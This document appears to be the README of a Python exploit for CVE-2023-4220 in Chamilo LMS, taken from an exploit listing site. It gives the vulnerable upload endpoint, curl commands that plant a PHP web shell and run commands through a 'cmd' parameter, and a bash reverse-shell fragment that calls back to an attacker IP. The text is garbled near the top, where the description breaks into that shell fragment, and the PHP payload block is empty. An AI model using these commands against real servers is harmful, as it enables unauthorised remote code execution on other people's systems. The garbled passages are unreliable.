## https://sploitus.com/exploit?id=00F0A6F0-DE0C-5E3C-9F8C-88889E34121D
# ChamiloLMS CVE-2023-4220 Exploit
Python exploit for **CVE-2023-4220**, an unauthenticated arbitrary file upload vulnerability affecting **Chamilo LMS & /dev/tcp/10.10.14.3/4444 0>&1'
```
Make sure the `LHOST` value is reachable from the target. In VPN environments, this is usually your tunnel interface address:
```bash
ip -brief addr show tun0
```
---
## Vulnerability Details
**CVE-2023-4220** affects Chamilo LMS versions up to and including **1.11.24**.
The vulnerable upload handler is located at:
```text
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
```
The action abused by the exploit is:
```text
?action=post-unsupported
```
Uploaded files are commonly accessible from:
```text
/main/inc/lib/javascript/bigupload/files/
```
The exploit sends a `multipart/form-data` POST request using the form field expected by BigUpload:
```text
bigUploadFile
```
The uploaded PHP payload is a small command wrapper:
```php
```
Commands are passed through the `cmd` GET parameter:
```text
http://target.com/main/inc/lib/javascript/bigupload/files/shell.php?cmd=id
```
The markers around the command output are used to extract the relevant part of the HTTP response.
---
## Manual Request
The upload performed by the scripts is equivalent to:
```bash
curl -i -s -X POST \
-F 'bigUploadFile=@shell.php;filename=shell.php' \
'http://target.com/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
```
After a successful upload, command execution can be tested with:
```bash
curl 'http://target.com/main/inc/lib/javascript/bigupload/files/shell.php?cmd=id'
```
---
## Notes
`--check` only verifies whether the expected BigUpload files directory is reachable. A positive result does not guarantee that the target is exploitable.
A full validation requires uploading the PHP payload and confirming command execution with `--upload` or `--cmd`.
If the upload works but command execution fails, PHP execution may be disabled in the upload directory, the target may be patched, or a server-side rule may be blocking the request.
Use `--cleanup` if you want the script to try removing the uploaded PHP file after execution.